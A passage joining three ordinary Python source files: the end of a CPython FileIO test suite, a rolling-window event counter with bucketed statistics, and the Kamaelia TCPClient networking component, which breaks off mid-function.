self.assertRaises(ValueError, method)
# methods with one argument
self.assertRaises(ValueError, self.f.readinto, 0)
self.assertRaises(ValueError, self.f.write, 0)
self.assertRaises(ValueError, self.f.seek, 0)
def testOpendir(self):
# Issue 3703: opening a directory should fill the errno
# Windows always returns "[Errno 13]: Permission denied"
# Unix calls dircheck() and returns "[Errno 21]: Is a directory"
try:
_FileIO('.', 'r')
except IOError as e:
self.assertNotEqual(e.errno, 0)
self.assertEqual(e.filename, ".")
else:
self.fail("Should have raised IOError")
#A set of functions testing that we get expected behaviour if someone has
#manually closed the internal file descriptor. First, a decorator:
def ClosedFD(func):
@wraps(func)
def wrapper(self):
#forcibly close the fd before invoking the problem function
f = self.f
os.close(f.fileno())
try:
func(self, f)
finally:
try:
self.f.close()
except IOError:
pass
return wrapper
def ClosedFDRaises(func):
@wraps(func)
def wrapper(self):
#forcibly close the fd before invoking the problem function
f = self.f
os.close(f.fileno())
try:
func(self, f)
except IOError as e:
self.assertEqual(e.errno, errno.EBADF)
else:
self.fail("Should have raised IOError")
finally:
try:
self.f.close()
except IOError:
pass
return wrapper
@ClosedFDRaises
def testErrnoOnClose(self, f):
f.close()
@ClosedFDRaises
def testErrnoOnClosedWrite(self, f):
f.write('a')
@ClosedFDRaises
def testErrnoOnClosedSeek(self, f):
f.seek(0)
@ClosedFDRaises
def testErrnoOnClosedTell(self, f):
f.tell()
@ClosedFDRaises
def testErrnoOnClosedTruncate(self, f):
f.truncate(0)
@ClosedFD
def testErrnoOnClosedSeekable(self, f):
f.seekable()
@ClosedFD
def testErrnoOnClosedReadable(self, f):
f.readable()
@ClosedFD
def testErrnoOnClosedWritable(self, f):
f.writable()
@ClosedFD
def testErrnoOnClosedFileno(self, f):
f.fileno()
@ClosedFD
def testErrnoOnClosedIsatty(self, f):
self.assertEqual(f.isatty(), False)
def ReopenForRead(self):
try:
self.f.close()
except IOError:
pass
self.f = _FileIO(TESTFN, 'r')
os.close(self.f.fileno())
return self.f
@ClosedFDRaises
def testErrnoOnClosedRead(self, f):
f = self.ReopenForRead()
f.read(1)
@ClosedFDRaises
def testErrnoOnClosedReadall(self, f):
f = self.ReopenForRead()
f.readall()
@ClosedFDRaises
def testErrnoOnClosedReadinto(self, f):
f = self.ReopenForRead()
a = array(b'b', b'x'*10)
f.readinto(a)
class OtherFileTests(unittest.TestCase):
def testAbles(self):
try:
f = _FileIO(TESTFN, "w")
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
f.close()
f = _FileIO(TESTFN, "r")
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
f.close()
f = _FileIO(TESTFN, "a+")
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.assertEqual(f.isatty(), False)
f.close()
if sys.platform != "win32":
try:
f = _FileIO("/dev/tty", "a")
except EnvironmentError:
# When run in a cron job there just aren't any
# ttys, so skip the test. This also handles other
# OS'es that don't support /dev/tty.
pass
else:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
if sys.platform != "darwin" and \
'bsd' not in sys.platform and \
not sys.platform.startswith('sunos'):
# Somehow /dev/tty appears seekable on some BSDs
self.assertEqual(f.seekable(), False)
self.assertEqual(f.isatty(), True)
f.close()
finally:
os.unlink(TESTFN)
def testModeStrings(self):
# check invalid mode strings
for mode in ("", "aU", "wU+", "rw", "rt"):
try:
f = _FileIO(TESTFN, mode)
except ValueError:
pass
else:
f.close()
self.fail('%r is an invalid file mode' % mode)
def testUnicodeOpen(self):
# verify repr works for unicode too
f = _FileIO(str(TESTFN), "w")
f.close()
os.unlink(TESTFN)
def testBytesOpen(self):
# Opening a bytes filename
try:
fn = TESTFN.encode("ascii")
except UnicodeEncodeError:
# Skip test
return
f = _FileIO(fn, "w")
try:
f.write(b"abc")
f.close()
with open(TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abc")
finally:
os.unlink(TESTFN)
def testInvalidFd(self):
self.assertRaises(ValueError, _FileIO, -10)
self.assertRaises(OSError, _FileIO, make_bad_fd())
if sys.platform == 'win32':
raise unittest.SkipTest('Set _invalid_parameter_handler for low level io')
import msvcrt
self.assertRaises(IOError, msvcrt.get_osfhandle, make_bad_fd())
def testBadModeArgument(self):
# verify that we get a sensible error message for bad mode argument
bad_mode = "qwerty"
try:
f = _FileIO(TESTFN, bad_mode)
except ValueError as msg:
if msg.args[0] != 0:
s = str(msg)
if TESTFN in s or bad_mode not in s:
self.fail("bad error message for invalid mode: %s" % s)
# if msg.args[0] == 0, we're probably on Windows where there may be
# no obvious way to discover why open() failed.
else:
f.close()
self.fail("no error for invalid mode: %s" % bad_mode)
def testTruncate(self):
f = _FileIO(TESTFN, 'w')
f.write(bytes(bytearray(range(10))))
self.assertEqual(f.tell(), 10)
f.truncate(5)
self.assertEqual(f.tell(), 10)
self.assertEqual(f.seek(0, os.SEEK_END), 5)
f.truncate(15)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.seek(0, os.SEEK_END), 15)
f.close()
def testTruncateOnWindows(self):
def bug801631():
# SF bug <http://www.python.org/sf/801631>
# "file.truncate fault on windows"
f = _FileIO(TESTFN, 'w')
f.write(bytes(range(11)))
f.close()
f = _FileIO(TESTFN,'r+')
data = f.read(5)
if data != bytes(range(5)):
self.fail("Read on file opened for update failed %r" % data)
if f.tell() != 5:
self.fail("File pos after read wrong %d" % f.tell())
f.truncate()
if f.tell() != 5:
self.fail("File pos after ftruncate wrong %d" % f.tell())
f.close()
size = os.path.getsize(TESTFN)
if size != 5:
self.fail("File size after ftruncate wrong %d" % size)
try:
bug801631()
finally:
os.unlink(TESTFN)
def testAppend(self):
try:
f = open(TESTFN, 'wb')
f.write(b'spam')
f.close()
f = open(TESTFN, 'ab')
f.write(b'eggs')
f.close()
f = open(TESTFN, 'rb')
d = f.read()
f.close()
self.assertEqual(d, b'spameggs')
finally:
try:
os.unlink(TESTFN)
except:
pass
def testInvalidInit(self):
self.assertRaises(TypeError, _FileIO, "1", 0, 0)
def testWarnings(self):
with check_warnings(quiet=True) as w:
self.assertEqual(w.warnings, [])
self.assertRaises(TypeError, _FileIO, [])
self.assertEqual(w.warnings, [])
self.assertRaises(ValueError, _FileIO, "/some/invalid/name", "rt")
self.assertEqual(w.warnings, [])
def test_surrogates(self):
# Issue #8438: try to open a filename containing surrogates.
# It should either fail because the file doesn't exist or the filename
# can't be represented using the filesystem encoding, but not because
# of a LookupError for the error handler "surrogateescape".
filename = u'\udc80.txt'
try:
with _FileIO(filename):
pass
except (UnicodeEncodeError, IOError):
pass
# Spawn a separate Python process with a different "file system
# default encoding", to exercise this further.
env = dict(os.environ)
env[b'LC_CTYPE'] = b'C'
_, out = run_python('-c', 'import _io; _io.FileIO(%r)' % filename, env=env)
if ('UnicodeEncodeError' not in out and
'IOError: [Errno 2] No such file or directory' not in out):
self.fail('Bad output: %r' % out)
def test_main():
# Historically, these tests have been sloppy about removing TESTFN.
# So get rid of it no matter what.
try:
run_unittest(AutoFileTests, OtherFileTests)
finally:
if os.path.exists(TESTFN):
os.unlink(TESTFN)
if __name__ == '__main__':
test_main()
|
|
from __future__ import absolute_import
from multiprocessing import Value, Lock, RLock
from collections import deque
import logging
import types
import time
import six
log = logging.getLogger(__name__)
class RollingNumber(object):
""" A **number** which can be used to track **counters** (increment) or set
values over time.
It is *rolling* in the sense that a window of :attr:`milliseconds` is
given to track (such as 10 seconds), which is then broken into
**buckets** (10 by default) so that the 10 second window doesn't empty
out and restart every 10 seconds; instead, every 1 second a new
:class:`Bucket` is added and the oldest dropped, so 9 of the buckets
remain and only the newest starts from scratch.
This is done so that the statistics are gathered over a *rolling* 10
second window with data being added/dropped in 1 second intervals
(or whatever granularity is defined by the arguments) rather than
each 10 second window starting at 0 again.
Performance-wise this class is optimized for writes, not reads. This is
done because it expects far higher write volume (thousands/second) than
reads (a few per second).
For example, on each read (such as :meth:`rolling_sum`) the buckets are
iterated to sum the data, so that writes don't have to maintain the
overall sum and pay a synchronization cost on every write just to keep
the sum up-to-date; a read can easily iterate the buckets and compute
the sum when it needs it.
See test module :mod:`tests.test_rolling_number` for usage and expected
behavior examples.
"""
# TODO: Change _time to be optional(update all tests:( )
def __init__(self, _time, milliseconds, bucket_numbers):
self.time = _time
self.milliseconds = milliseconds
self.buckets = BucketCircular(bucket_numbers)
self.bucket_numbers = bucket_numbers
self.cumulative = CumulativeSum()
self._new_bucket_lock = RLock()
if self.milliseconds % self.bucket_numbers != 0:
raise Exception('The milliseconds must divide equally into '
'bucket_numbers. For example 1000/10 is ok, '
'1000/11 is not.')
def buckets_size_in_milliseconds(self):
return self.milliseconds / self.bucket_numbers
def increment(self, event):
""" Increment the **counter** in the current bucket by one for the
given :class:`RollingNumberEvent` type.
The :class:`RollingNumberEvent` must be a **counter** type
>>> RollingNumberEvent.SUCCESS.is_counter()
True
Args:
event (:class:`RollingNumberEvent`): Event defining which
**counter** to increment.
"""
self.current_bucket().adder(event).increment()
def update_rolling_max(self, event, value):
""" Update a value and retain the max value.
The :class:`RollingNumberEvent` must be a **max updater** type
>>> RollingNumberEvent.THREAD_MAX_ACTIVE.is_max_updater()
True
Args:
value (int): Max value to update.
event (:class:`RollingNumberEvent`): Event defining which
**counter** to increment.
"""
self.current_bucket().max_updater(event).update(value)
def current_bucket(self):
""" Retrieve the current :class:`Bucket`
Retrieve the latest :class:`Bucket` if the given time is **BEFORE**
the end of the **bucket** window, otherwise it returns ``None``.
The following needs to be synchronized/locked even with a
synchronized/thread-safe data structure such as LinkedBlockingDeque
because the logic involves multiple steps to check existence,
create an object then insert the object. The 'check' or 'insertion'
themselves are thread-safe by themselves but not the aggregate
algorithm, thus we put this entire block of logic inside
synchronized.
I am using a :class:`multiprocessing.RLock` if/then
so that a single thread will get the lock and as soon as one thread
gets the lock all others will go the 'else' block and just return
the currentBucket until the newBucket is created. This should allow
the throughput to be far higher and only slow down 1 thread instead
of blocking all of them in each cycle of creating a new bucket based
on some testing (and it makes sense that it should as well).
This means the timing won't be exact to the millisecond as to what
data ends up in a bucket, but that's acceptable. It's not critical
to have exact precision to the millisecond, as long as it's rolling,
if we can instead reduce the impact of synchronization.
More importantly though it means that the 'if' block within the
lock needs to be careful about what it changes that can still
be accessed concurrently in the 'else' block since we're not
completely synchronizing access.
For example, we can't have a multi-step process to add a bucket,
remove a bucket, then update the sum since the 'else' block of code
can retrieve the sum while this is all happening. The trade-off is
that we don't maintain the rolling sum and let readers just iterate
bucket to calculate the sum themselves. This is an example of
favoring write-performance instead of read-performance and how the
tryLock versus a synchronized block needs to be accommodated.
Returns:
bucket: Returns the latest :class:`Bucket` or ``None``.
"""
# TODO: Check the doc string above^.
current_time = self.time.current_time_in_millis()
# a shortcut to try and get the most common result of immediately
# finding the current bucket
current_bucket = self.buckets.peek_last()
if current_bucket is not None and current_time < (current_bucket.window_start + self.buckets_size_in_milliseconds()):
return current_bucket
# A single writer creates new buckets: try to take the lock without
# blocking, as the docstring above describes; losing threads fall
# through to the else branch and reuse the latest existing bucket.
if self._new_bucket_lock.acquire(False):
    try:
        # If we didn't find the current bucket above, then we have to
        # create one.
        if self.buckets.peek_last() is None:
            new_bucket = Bucket(current_time)
            self.buckets.add_last(new_bucket)
            return new_bucket
        for i in range(self.bucket_numbers):
            last_bucket = self.buckets.peek_last()
            if current_time < (last_bucket.window_start + self.buckets_size_in_milliseconds()):
                return last_bucket
            elif current_time - (last_bucket.window_start + self.buckets_size_in_milliseconds()) > self.milliseconds:
                self.reset()
                return self.current_bucket()
            else:
                self.buckets.add_last(Bucket(last_bucket.window_start + self.buckets_size_in_milliseconds()))
                self.cumulative.add_bucket(last_bucket)
        return self.buckets.peek_last()
    finally:
        self._new_bucket_lock.release()
else:
    # we didn't get the lock so just return the latest bucket while
    # another thread creates the next one
    current_bucket = self.buckets.peek_last()
    if current_bucket is not None:
        return current_bucket
    # The rare scenario where multiple threads raced to create the
    # very first bucket: wait slightly, then retry via recursion
    # while the other thread finishes creating it.
    time.sleep(0.005)
    return self.current_bucket()
def reset(self):
""" Reset all rolling **counters**
Force a reset of all rolling **counters** (clear all **buckets**) so
that statistics start being gathered from scratch.
This does NOT reset the :class:`CumulativeSum` values.
"""
last_bucket = self.buckets.peek_last()
if last_bucket:
self.cumulative.add_bucket(last_bucket)
self.buckets.clear()
def rolling_sum(self, event):
""" Rolling sum
Get the sum of all buckets in the rolling counter for the given
:class:`RollingNumberEvent`.
The :class:`RollingNumberEvent` must be a **counter** type
>>> RollingNumberEvent.SUCCESS.is_counter()
True
Args:
event (:class:`RollingNumberEvent`): Event defining which counter
to retrieve values from.
Returns:
long: Return value from the given :class:`RollingNumberEvent`
counter type.
"""
last_bucket = self.current_bucket()
if not last_bucket:
return 0
sum = 0
for bucket in self.buckets:
sum += bucket.adder(event).sum()
return sum
def rolling_max(self, event):
values = self.values(event)
if not values:
return 0
else:
return values[len(values) - 1]
def values(self, event):
last_bucket = self.current_bucket()
if not last_bucket:
return 0
values = []
for bucket in self.buckets:
if event.is_counter():
values.append(bucket.adder(event).sum())
if event.is_max_updater():
values.append(bucket.max_updater(event).max())
return values
def value_of_latest_bucket(self, event):
last_bucket = self.current_bucket()
if not last_bucket:
return 0
return last_bucket.get(event)
def cumulative_sum(self, event):
""" Cumulative sum
The cumulative sum of all buckets ever since the start without
rolling for the given :class:`RollingNumberEvent` type.
See :meth:`rolling_sum` for the rolling sum.
The :class:`RollingNumberEvent` must be a **counter** type
>>> RollingNumberEvent.SUCCESS.is_counter()
True
Args:
event (:class:`RollingNumberEvent`): Event defining which
**counter** to increment.
Returns:
long: Returns the cumulative sum of all **increments** and
**adds** for the given :class:`RollingNumberEvent` **counter**
type.
"""
return self.value_of_latest_bucket(event) + self.cumulative.get(event)
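# Minimal usage sketch for RollingNumber (illustrative helper only; the clock
# class below is hypothetical -- any object exposing current_time_in_millis(),
# the only method RollingNumber calls on its time source, will do):
def _example_rolling_number_usage():
    class _WallClock(object):
        def current_time_in_millis(self):
            return int(time.time() * 1000)
    counter = RollingNumber(_WallClock(), milliseconds=10000, bucket_numbers=10)
    counter.increment(RollingNumberEvent.SUCCESS)
    counter.update_rolling_max(RollingNumberEvent.THREAD_MAX_ACTIVE, 3)
    return counter.rolling_sum(RollingNumberEvent.SUCCESS)  # -> 1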
class BucketCircular(deque):
''' This is a circular array acting as a FIFO queue. '''
def __init__(self, size):
super(BucketCircular, self).__init__(maxlen=size)
@property
def size(self):
return len(self)
def last(self):
return self.peek_last()
def peek_last(self):
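# Note: the most recently added bucket lives at index 0, because
# add_last() below uses appendleft(); "last" means newest, not the
# tail of the deque.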
try:
return self[0]
except IndexError:
return None
def add_last(self, bucket):
self.appendleft(bucket)
class Bucket(object):
""" Counters for a given :class:`Bucket` of time
We support both :class:`LongAdder` and :class:`LongMaxUpdater` in a
:class:`Bucket` but don't want the memory allocation of all types for each
so we only allocate the objects if the :class:`RollingNumberEvent` matches
the correct **type** - though we still have the allocation of empty arrays
to the given length as we want to keep using the **type** value for fast
random access.
"""
def __init__(self, start_time):
self.window_start = start_time
self._adder = {}
self._max_updater = {}
# TODO: Change this to use a metaclass
for name, event in RollingNumberEvent.__members__.items():
if event.is_counter():
self._adder[event.name] = LongAdder()
for name, event in RollingNumberEvent.__members__.items():
if event.is_max_updater():
self._max_updater[event.name] = LongMaxUpdater()
def get(self, event):
if event.is_counter():
return self.adder(event).sum()
if event.is_max_updater():
return self.max_updater(event).max()
raise Exception('Unknown type of event.')
# TODO: Rename to add
def adder(self, event):
if event.is_counter():
return self._adder[event.name]
raise Exception('Type is not a LongAdder.')
# TODO: Rename to update_max
def max_updater(self, event):
if event.is_max_updater():
return self._max_updater[event.name]
raise Exception('Type is not a LongMaxUpdater.')
class LongAdder(object):
def __init__(self, min_value=0):
self.count = Value('i', min_value)
# TODO: Which is better: this explicit Lock, or using the lock that
# multiprocessing.Value itself provides (see the multiprocessing docs)?
self.lock = Lock()
def increment(self):
with self.lock:
self.count.value += 1
def decrement(self):
with self.lock:
self.count.value -= 1
def sum(self):
with self.lock:
return self.count.value
def add(self, value):
with self.lock:
self.count.value += value
class LongMaxUpdater(object):
def __init__(self, min_value=0):
self.count = Value('i', min_value)
# TODO: Which is better: this explicit Lock, or using the lock that
# multiprocessing.Value itself provides (see the multiprocessing docs)?
self.lock = Lock()
def max(self):
with self.lock:
return self.count.value
def update(self, value):
# compare-and-set under a single lock acquisition, so concurrent updates
# cannot interleave between the comparison and the assignment
with self.lock:
if value > self.count.value:
self.count.value = value
class CumulativeSum(object):
def __init__(self):
self._adder = {}
self._max_updater = {}
# TODO: Change this to use a metaclass
for name, event in RollingNumberEvent.__members__.items():
if event.is_counter():
self._adder[event.name] = LongAdder()
for name, event in RollingNumberEvent.__members__.items():
if event.is_max_updater():
self._max_updater[event.name] = LongMaxUpdater()
def add_bucket(self, bucket):
for name, event in RollingNumberEvent.__members__.items():
if event.is_counter():
self.adder(event).add(bucket.adder(event).sum())
if event.is_max_updater():
self.max_updater(event).update(bucket.max_updater(event).max())
def get(self, event):
if event.is_counter():
return self.adder(event).sum()
if event.is_max_updater():
return self.max_updater(event).max()
raise Exception('Unknown type of event.')
def adder(self, event):
if event.is_counter():
return self._adder[event.name]
raise Exception('Unknown type of event.')
def max_updater(self, event):
if event.is_max_updater():
return self._max_updater[event.name]
raise Exception('Unknown type of event.')
def _is_function(obj):
return isinstance(obj, types.FunctionType)
def _is_dunder(name):
return (name[:2] == name[-2:] == '__' and
name[2:3] != '_' and
name[-3:-2] != '_' and
len(name) > 4)
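# _is_dunder mirrors the check used by the stdlib enum module: it is true
# only for names of the form __name__ with at least one character between
# the double underscores, e.g. (illustrative):
#
#   _is_dunder('__init__')   # True
#   _is_dunder('__')         # False (too short)
#   _is_dunder('_private_')  # False (single underscores)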
class Event(object):
def __init__(self, name, value):
self._name = name
self._value = value
def is_counter(self):
return self._value == 1
def is_max_updater(self):
return self._value == 2
@property
def name(self):
return self._name
@property
def value(self):
return self._value
class EventMetaclass(type):
def __new__(cls, name, bases, attrs):
__members = {}
for name, value in attrs.items():
if not _is_dunder(name) and not _is_function(value):
__members[name] = Event(name, value)
for name, value in __members.items():
attrs[name] = __members[name]
new_class = super(EventMetaclass, cls).__new__(cls, name,
bases, attrs)
setattr(new_class, '__members__', __members)
return new_class
class RollingNumberEvent(six.with_metaclass(EventMetaclass, object)):
""" Various states/eveents that can be captured in the
:class:`RollingNumber`.
Note that events are defined as different types:
>>> self.is_counter() == True
True
>>> self.is_max_updater() == True
True
The **counter** type events can be used with
:meth:`RollingNumber.increment`, :meth:`RollingNumber.add`,
:meth:`RollingNumber.rolling_sum` and others.
The **max updater** type events can be used with
:meth:`RollingNumber.update_rolling_max` and
:meth:`RollingNumber.rolling_max`.
"""
SUCCESS = 1
FAILURE = 1
TIMEOUT = 1
SHORT_CIRCUITED = 1
THREAD_POOL_REJECTED = 1
SEMAPHORE_REJECTED = 1
FALLBACK_SUCCESS = 1
FALLBACK_FAILURE = 1
FALLBACK_REJECTION = 1
EXCEPTION_THROWN = 1
THREAD_EXECUTION = 1
THREAD_MAX_ACTIVE = 2
COLLAPSED = 1
RESPONSE_FROM_CACHE = 1
def __init__(self, event):
self._event = event
def is_counter(self):
""" Is counter
Returns:
bool: ``True`` if the event type is **counter**, otherwise
``False``.
"""
return self._event.value == 1
def is_max_updater(self):
""" Is mas updater
Returns:
bool: Returns ``True`` event type is **max updater**, otherwise
it returns ``False`` .
"""
return self._event.value == 2
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# FIXME: Uses the selector service, but has no way of indicating to the
# selector service that its services are no longer required.
# This needs resolving.
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
"""\
=================
Simple TCP Client
=================
This component is for making a TCP connection to a server. Send to its "inbox"
inbox to send data to the server. Pick up data received from the server on its
"outbox" outbox.
Example Usage
-------------
Sending the contents of a file to a server at address 1.2.3.4 on port 1000::
Pipeline( RateControlledFileReader("myfile", rate=100000),
TCPClient("1.2.3.4", 1000),
).activate()
Example Usage - SSL
-------------------
It is also possible to cause the TCPClient to switch into SSL mode. To do this
you send it a message on its "makessl" inbox. It is necessary for a number of
protocols to be able to switch between non-ssl and ssl, hence this approach
rather than simply saying "ssl client" or "non-ssl client"::
Graphline(
MAKESSL = OneShot(" make ssl "),
CONSOLE = ConsoleReader(),
ECHO = ConsoleEchoer(),
CONNECTION = TCPClient("kamaelia.svn.sourceforge.net", 443),
linkages = {
("MAKESSL", "outbox"): ("CONNECTION", "makessl"),
("CONSOLE", "outbox"): ("CONNECTION", "inbox"),
("CONNECTION", "outbox"): ("ECHO", "inbox"),
}
)
How does it work?
-----------------
TCPClient opens a socket connection to the specified server on the specified
port. Data received over the connection appears at the component's "outbox"
outbox as strings. Data can be sent as strings by sending it to the "inbox"
inbox.
An optional delay (between component activation and attempting to connect) can
be specified. The default is no delay.
It creates a ConnectedSocketAdapter (CSA) to handle the socket connection and
registers it with a selectorComponent so it is notified of incoming data. The
selectorComponent is obtained by calling
selectorComponent.getSelectorService(...) to look it up with the local
Coordinating Assistant Tracker (CAT).
TCPClient wires itself to the "CreatorFeedback" outbox of the CSA. It also wires
its "inbox" inbox to pass data straight through to the CSA's "inbox" inbox,
and its "outbox" outbox to pass through data from the CSA's "outbox" outbox.
Socket errors (after the connection has been successfully established) may be
sent to the "signal" outbox.
This component will terminate if the CSA sends a socketShutdown message to its
"CreatorFeedback" outbox.
This component will terminate if a shutdownMicroprocess or producerFinished
message is sent to its "control" inbox. This message is forwarded onto the CSA.
TCPClient will then wait for the CSA to terminate. It then sends its own
shutdownMicroprocess message out of the "signal" outbox.
"""
import sys
import socket
import errno
import Axon
from Axon.util import Finality
from Axon.Ipc import producerFinished, shutdownMicroprocess
from Axon.Ipc import newComponent, status
from Kamaelia.IPC import socketShutdown, newCSA
from Kamaelia.IPC import newReader, newWriter
from Kamaelia.IPC import removeReader, removeWriter
from Kamaelia.Internet.ConnectedSocketAdapter import ConnectedSocketAdapter
from Kamaelia.Internet.Selector import Selector
# from Kamaelia.Apps.SocialBookmarks.Print import Print # For debug purposes
import time
class TCPClient(Axon.Component.component):
"""\
TCPClient(host,port[,delay]) -> component with a TCP connection to a server.
Establishes a TCP connection to the specified server.
Keyword arguments:
- host -- address of the server to connect to (string)
- port -- port number to connect on
- delay -- delay (seconds) after activation before connecting (default=0)
"""
Inboxes = { "inbox" : "data to send to the socket",
"_socketFeedback" : "notifications from the ConnectedSocketAdapter",
"control" : "Shutdown signalling",
"makessl" : "Notifications to the ConnectedSocketAdapter that we want to negotiate SSL",
}
Outboxes = { "outbox" : "data received from the socket",
"signal" : "socket errors",
"_selectorSignal" : "For registering and deregistering ConnectedSocketAdapter components with a selector service",
"sslready" : "SSL negotiated successfully",
}
Usescomponents=[ConnectedSocketAdapter] # List of classes used.
def __init__(self,host,port,delay=0, connect_timeout=60, wait_for_serverclose = False):
"""x.__init__(...) initializes x; see x.__class__.__doc__ for signature"""
super(TCPClient, self).__init__()
self.host = host
self.port = port
self.delay=delay
self.CSA = None
self.sock = None
self.howDied = None
self.connect_timeout = connect_timeout
self.wait_for_serverclose = wait_for_serverclose
def main(self):
"""Main loop."""
# wait before connecting
waitUntil = time.time() + self.delay
while time.time() < waitUntil:
yield 1
for v in self.runClient():
yield v
if (self.sock is not None) and (self.CSA is not None):
self.send(removeReader(self.CSA, self.sock), "_selectorSignal")
self.send(removeWriter(self.CSA, self.sock), "_selectorSignal")
def setupCSA(self, sock):
"""\
setupCSA(sock) -> new ConnectedSocketAdapter component
Creates a ConnectedSocketAdapter component for the socket, and wires up to
it. Also sends the CSA to the "selector" service.
"""
selectorService, selectorShutdownService, newSelector = Selector.getSelectorServices(self.tracker)
if newSelector:
self.addChildren(newSelector)
CSA = ConnectedSocketAdapter(sock, selectorService) # self.createConnectedSocket(sock)
self.addChildren(CSA)
self.link((self, "_selectorSignal"),selectorService)
self.link((CSA, "CreatorFeedback"),(self,"_socketFeedback"))
self.link((CSA, "outbox"), (self, "outbox"), passthrough=2)
self.link((CSA, "sslready"), (self, "sslready"), passthrough=2)
self.link((self, "inbox"), (CSA, "inbox"), passthrough=1)
self.link((self, "makessl"), (CSA, "makessl"), passthrough=1)
self.link((self, "control"), (CSA, "control"), passthrough=1) # propagate shutdown msgs
self.send(newReader(CSA, ((CSA, "ReadReady"), sock)), "_selectorSignal")
self.send(newWriter(CSA, ((CSA, "SendReady"), sock)), "_selectorSignal")
self.CSA = CSA # We need this for shutdown later
return self.childComponents()
def waitCSAClose(self):
"""Returns True if a socketShutdown message is received on "_socketFeedback" inbox."""
if self.dataReady("_socketFeedback"):
message = self.recv("_socketFeedback")
if isinstance(message, socketShutdown):
try:
sock, howdied = message  # 'sock', not 'socket', to avoid shadowing the module
self.howDied = howdied
except TypeError:
self.howDied = None
return False
return True
def safeConnect(self, sock, *sockArgsList):
"""\
Connect to socket and handle possible errors that may occur.
Returns True if successful, or False on failure. Unhandled errors are raised
as exceptions.
"""
try:
sock.connect(*sockArgsList); # Expect socket.error: (115, 'Operation now in progress')
# EALREADY
# The socket is non-blocking and a previous connection
# attempt has not yet been completed.
self.connecting=0
return True
except socket.error:
msg = sys.exc_info()[1]
(errorno, errmsg) = msg.args
if errorno==errno.EALREADY:
# The socket is non-blocking and a previous connection attempt has not yet been completed
# We handle this by allowing the code to come back and repeatedly retry
# connecting. This is a valid, if brute force approach.
assert(self.connecting==1)
return False
elif errorno==errno.EINPROGRESS or errorno==errno.EWOULDBLOCK:
#The socket is non-blocking and the connection cannot be completed immediately.
# We handle this by allowing the code to come back and repeatedly retry
# connecting. Rather brute force.
if not getattr(self, 'connecting', 0):
self.connecting=1
return False # Not connected should retry until no error
else:
# MSW doesn't raise a nice connection refused exception. Instead
# we detect going from a WSAEINVAL (like EALREADY for windows) back to a
# EWOULDBLOCK which means the connection was refused and we are trying to
# connect for a second time.
raise socket.error(errno.ECONNREFUSED, 'Connection refused')
elif errorno == errno.EISCONN:
# This is a windows error indicating the connection has already been made.
self.connecting = 0 # as with the no exception case.
return True
elif hasattr(errno, "WSAEINVAL"):
if errorno == errno.WSAEINVAL:
# If we are on windows, this will be the error instead of EALREADY
# above.
assert(self.connecting==1)
return False
else:
raise msg # We're on a Windows platform and an unknown exception occurred
# Anything else is an error we don't handle
else:
raise msg
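# The errno handling above is the standard non-blocking connect dance,
# reduced to its core (an illustrative sketch outside the component
# machinery; host and port are placeholders):
#
#   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   s.setblocking(0)
#   try:
#       s.connect((host, port))   # usually raises EINPROGRESS at first
#   except socket.error:
#       e = sys.exc_info()[1]
#       if e.args[0] not in (errno.EINPROGRESS, errno.EALREADY,
#                            errno.EWOULDBLOCK):
#           raise
#   # ...then poll/select until writable and check SO_ERROR, which is
#   # what the repeated safeConnect() calls approximate here.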
def runClient(self,sock=None):
# The various numbers yielded here indicate progress through the function, and
# nothing else specific.
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM); yield 0.3
# Print( "GOT SOCK" )
self.sock = sock # We need this for shutdown later
try:
sock.setblocking(0); yield 0.6
# Print( "GOT A NON BLOCK" )
try:
tryUntil = time.time() + self.connect_timeout
# Print( "GOT A ODD SOCK" )
while not self.safeConnect(sock,(self.host, self.port)):
if self.shutdown():
return
if time.time() >= tryUntil:
self.howDied = "timeout"
raise Finality
yield 1
# Print( "CONNECTED" )
yield newComponent(*self.setupCSA(sock))
while self.waitCSAClose():
self.pause()
yield 2
raise Finality
except Exception:
x = sys.exc_info()[1]
# Print( "SHUTTING SOCK",x )
result = sock.shutdown(2) ; yield 3
raise x # XXXX If X is not finality, an error message needs to get sent _somewhere_ else
# The logical place to send the error is to the signal outbox
except Exception:
x = sys.exc_info()[1]
# Print( "CLOSING SOCK",x )
sock.close() ; yield 4,x # XXXX If X is not finality, an error message needs to get sent _somewhere_ else
raise x
except Finality:
# Print( "LOOKING GOOD SOCK" )
yield 5
except socket.error:
e = sys.exc_info()[1]
# We now do the flipside of setupCSA, whether we had an error or not
# A safe error relates to a disconnected server, and unsafe error is generally
# bad. However either way, it's gone, let's let the person using this
# component know, shutdown everything, and get outta here.
#
# FIXME: Set self.howDied here as well
#
# Print( "SMELLY SOCK", e )
pass
self.send(producerFinished(self,self.howDied), "signal")
# self.send(e, "signal")
# "TCPC: Exitting run client"
def stop(self):
"""Stop method provided to allow the scheduler to kill TCPClient connections cleanly if necessary.
(Only rarely, if ever, needed - you are not expected to call this yourself)"""
try:
self.sock.shutdown(2)
except:
pass # Well, we tried.
try:
self.sock.close()
except:
pass # Well, we tried.
self.send(producerFinished(self,self.howDied), "signal")
if (self.sock is not None) and (self.CSA is not None):
self.send(removeReader(self.CSA, self.sock), "_selectorSignal")
self.send(removeWriter(self.CSA, self.sock), "_selectorSignal")
self.send(producerFinished(),"signal")
super(TCPClient, self).stop()
def shutdown(self):
while self.dataReady("control"):
msg = self.recv("control")
if not self.wait_for_serverclose:
self.send(msg,"signal")
return isinstance(msg, (producerFinished,shutdownMicroprocess))
else:
